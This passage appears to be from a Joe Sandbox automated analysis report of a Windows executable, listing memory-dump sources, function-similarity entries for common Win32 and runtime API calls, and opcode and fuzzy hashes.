                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LoadString
                                  • String ID:
                                  • API String ID: 2948472770-0
                                  • Opcode ID: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                  • Instruction ID: 5829fc700a73a8b25f38eb18c8e3ccea6c42840098cdec2a4593a3d7dde8798f
                                  • Opcode Fuzzy Hash: dedc9b699e454723cd5290fbfd2bbed97dba7cc30504e392eb1ac5c410963244
                                  • Instruction Fuzzy Hash: EB116464B08B4287E600AF1AB84406CF7E1AB89FE0BD44539CA1CC3321DF3CF6418394
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileLastPointer
                                  • String ID:
                                  • API String ID: 2976181284-0
                                  • Opcode ID: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                  • Instruction ID: e9cd951a7888f8e3d31ef161450b9e5778789d14fd0e8adafc8d19736869dc42
                                  • Opcode Fuzzy Hash: f476d2bfd4726034d9589a57a35db9820aa07498a5a105237817cbeb34648ff6
                                  • Instruction Fuzzy Hash: 7F116221A1864183E760AF65B44027DE360EB54FB4F954331EA3D927D4DF2CF692C751
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Item$RectText$ClientWindowswprintf
                                  • String ID:
                                  • API String ID: 402765569-0
                                  • Opcode ID: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                  • Instruction ID: c64c4d1b97fd30aad8618f4713b3f2b9887e933a1c666dd515bdf0bb934e9116
                                  • Opcode Fuzzy Hash: 7b1a7923946a01b82bc000e866a5e8131c4a3fcb45aa136cf21fa47d66a637f8
                                  • Instruction Fuzzy Hash: 72016D10A1824683FA1A7F61B44827CD7916F45F64F990134CE0D863DA9F2CF68583A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                  • String ID:
                                  • API String ID: 1173176844-0
                                  • Opcode ID: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
                                  • Instruction ID: 130bb71e501d76123c9a5263a9c29bc4a84c4e04be37a1544bc3696e42c75ee6
                                  • Opcode Fuzzy Hash: 2418f657b74aff0bbbd954836f942504a57e752e7ff65bc5a56a0d55cdee3a56
                                  • Instruction Fuzzy Hash: 2BE09241E1D20746FA583EA124591BDC0840F18B71E981B30E93E863C3AE18B46681B0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLanguagesLastPreferredRestoreThread
                                  • String ID:
                                  • API String ID: 588628887-0
                                  • Opcode ID: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                  • Instruction ID: b21067c61689fc0c0da94f58b6908abb6314e053d227758ac84a0e96ed3e4a0e
                                  • Opcode Fuzzy Hash: 6c19af78ecb99c12c8b97ad79194141d8da1ece1a7cca7b9391e8fefba4d6bd8
                                  • Instruction Fuzzy Hash: 96E08690E092434BFF067FB2788407DD2906F58F61B844434DD0DC63A1EF6CB58546A4
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CompareString_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1017591355-0
                                  • Opcode ID: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                  • Instruction ID: a5d8f9993bab56ad69ff3f1c9b7ed40a980ff6be5f4e89f146a87465df36efc4
                                  • Opcode Fuzzy Hash: 19fa4a8e4b1c701ff79f09de193f0e6c9bff8c4b1f7545da9f0c168cfcf595ef
                                  • Instruction Fuzzy Hash: 7F610411E0C64347EA68BE11641527EE2999F40FF4F968231DA4E977C5EF2CF64183A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3668304517-0
                                  • Opcode ID: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
                                  • Instruction ID: 2140fb83954e0c77380fc38384b829854539159ffecc7f29413ee1bb41b22d7b
                                  • Opcode Fuzzy Hash: 9ca4a83d2b63779bf708ac485e26fdd1a63016ab321697bfea32e07a43e704da
                                  • Instruction Fuzzy Hash: F7714A22F1965247FB10EF66B4446BDE2A2AF44FB4F904131E92E977D5DF28B48082A0
                                  APIs
                                    • Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01979DB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1011579015-0
                                  • Opcode ID: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
                                  • Instruction ID: 095633e736e8653862482cd64fe92782571a0c368197721d28d489c4dda52d2d
                                  • Opcode Fuzzy Hash: badc78b1171942a7d3096e5594fb818a2bb200fdfb059f9f01d9a7c201ae8695
                                  • Instruction Fuzzy Hash: F4811661E08B4287FA50BF15B84827CE6A2AF85F74FD80135D95DC2795DF6CFA8483A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3668304517-0
                                  • Opcode ID: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                  • Instruction ID: d014d07bf3e74c75c1d09b3d6f5a55bfc713284c528dc42b2a0d4ceab635e970
                                  • Opcode Fuzzy Hash: 552ce37b39ad09a62a9f47879426a5d42276c048784179878e98e6da6e12f1cc
                                  • Instruction Fuzzy Hash: 66616521A1C78243EA60BF18F8852FDE395EF95B64FC04131D98D86BA5DF6CF58087A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 3668304517-0
                                  • Opcode ID: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
                                  • Instruction ID: 480cdb23b1d5132ee37d8f5cbde96759f8df9cfc7f8c703af8c752f5b278f98e
                                  • Opcode Fuzzy Hash: 54602dd0ec26bd2d79ceeb5ca0cc47b122a19acca21d15c1e6fc8212b5c90648
                                  • Instruction Fuzzy Hash: 2741AE22A08B4542EB10AF24E14536DE3A1EB44FF8FD50234DA5D877A9EF2DF64187A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: HandleModule$AddressFreeLibraryProc
                                  • String ID:
                                  • API String ID: 3947729631-0
                                  • Opcode ID: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                  • Instruction ID: ad3487e57bd63c33e8eca348cabb84823de46d9b1fd8c172267593b2ac914bfe
                                  • Opcode Fuzzy Hash: 4a2f43bead39ce058c557f5b4fc102bf9ea9cb7a759dd16a39b16621d9c8bbb2
                                  • Instruction Fuzzy Hash: 3F419721A1962283EB24BF91B49023DE2A1BF44F61F84403AD91EC7792DF6CF95487F0
                                  APIs
                                    • Part of subcall function 00007FF7C0186288: FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C0195023
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 1011579015-0
                                  • Opcode ID: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                  • Instruction ID: 4eb8140db315f056063f4137854b5e5828cb5b922e546ec2561416e238fcba0b
                                  • Opcode Fuzzy Hash: 8e1b62b4adbf0026937254bcfc6fd8c1cb42753d58653c909ec536b3b6315e0b
                                  • Instruction Fuzzy Hash: 11316021B1874683EA10AF19F44477DE391BF85BA0FC40235EA9D87B95DF2CF44187A0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _invalid_parameter_noinfo
                                  • String ID:
                                  • API String ID: 3215553584-0
                                  • Opcode ID: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                  • Instruction ID: 0820a21135a09f69ea6a56ae0c5b32d672c2f114ed7062a629cbf57231e5ccd4
                                  • Opcode Fuzzy Hash: d0a039c216fd43f6ed93c381b723f8e0e858f96ef93bc530090e045798fe727a
                                  • Instruction Fuzzy Hash: CB11597691868283E620AF12B48057DF2A5FB41BA0FD44434EA9D87BD1DF2CF9408BA0
                                  APIs
                                    • Part of subcall function 00007FF7C01A2BF4: GetDlgItem.USER32 ref: 00007FF7C01A2C33
                                    • Part of subcall function 00007FF7C01A2BF4: ShowWindow.USER32 ref: 00007FF7C01A2C59
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C6E
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2C86
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CA7
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2CC3
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D06
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D24
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D38
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D62
                                    • Part of subcall function 00007FF7C01A2BF4: IsDlgButtonChecked.USER32 ref: 00007FF7C01A2D7A
                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7C01A3807
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                  • String ID:
                                  • API String ID: 4003826521-0
                                  • Opcode ID: 25e6bccfff313813c7b6651f727f9e62e310442583c3d4eabf682956948fe027
                                  • Instruction ID: 2bd2312ff4f8db0d1fa8bf0b3f689f17512797d640fca5feb7a6bb96b2b9fb45
                                  • Opcode Fuzzy Hash: 25e6bccfff313813c7b6651f727f9e62e310442583c3d4eabf682956948fe027
                                  • Instruction Fuzzy Hash: C801A5A2A2868543EA14AF64E04636DE351EF89BB0F900331F69C8ABC6DF2CF1508650
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                  • Instruction ID: 0a5fba05f94fec94608e6c41ab663476bd025ac96efd6342782997193b4f96e6
                                  • Opcode Fuzzy Hash: 973ac4a955278155064161a4d63dbe6b99ccc62035c0026a498718668b27418c
                                  • Instruction Fuzzy Hash: 13F03C84B0920287FE557E6669456BED2905F88FA0F880434CE0DC67D2DF2CF58842B4
                                  APIs
                                    • Part of subcall function 00007FF7C018647C: FindFirstFileW.KERNELBASE ref: 00007FF7C01864CB
                                    • Part of subcall function 00007FF7C018647C: FindFirstFileW.KERNELBASE ref: 00007FF7C018651E
                                    • Part of subcall function 00007FF7C018647C: GetLastError.KERNEL32 ref: 00007FF7C018656F
                                  • FindClose.KERNELBASE(?,?,?,00007FF7C018FFA5), ref: 00007FF7C01862BD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileFirst$CloseErrorLast
                                  • String ID:
                                  • API String ID: 1464966427-0
                                  • Opcode ID: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                  • Instruction ID: d88859add7192547d0f5070ba5cb7f12ca8a420ae6a13dca8f8fac466ad7df52
                                  • Opcode Fuzzy Hash: 3b96e4bc9674b0bfe861db3a8d48e59cac22d33fe6a98766aeed1da261f7cc18
                                  • Instruction Fuzzy Hash: EAF0D16290824186DA50BF74A00417CF7619B1AFB8F550374EA7C473CBCF18E544C7A6
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7C018427E), ref: 00007FF7C01842F6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ChangeCloseFindNotification
                                  • String ID:
                                  • API String ID: 2591292051-0
                                  • Opcode ID: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                  • Instruction ID: c55c47fc90848f2a1da142a61afa3744f74362cdea84f72588f55fdccc49d73d
                                  • Opcode Fuzzy Hash: 9c850ec0e91a3c36dd67a082f4f7d32c48f886c19389c1b26b24c46edd12351b
                                  • Instruction Fuzzy Hash: 31F08122A0864297EB249F21F04037DF760EB04F79F9A4334DA39812D4DF28EA95C3A1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719134620.00007FF7C01EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ff7c0180000_ywXeiXEvP2.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                  • Instruction ID: d813103fded45ed2a9131c32838268430973a77c7ac226aaa29d2aea58024e3d
                                  • Opcode Fuzzy Hash: 6cb8d6af9808862ce5c6d1e218701f51077bf56df55e472ff95833f18a2663ca
                                  • Instruction Fuzzy Hash: F3F03080A192428BFA567E61794167DD1804F84F71F884A349C6EC53C1DF2CF48085B8
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1719007556.00007FF7C0181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C0180000, based on PE: true
                                  • Associated: 00000000.00000002.1718986528.00007FF7C0180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719050063.00007FF7C01BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmpDownload File
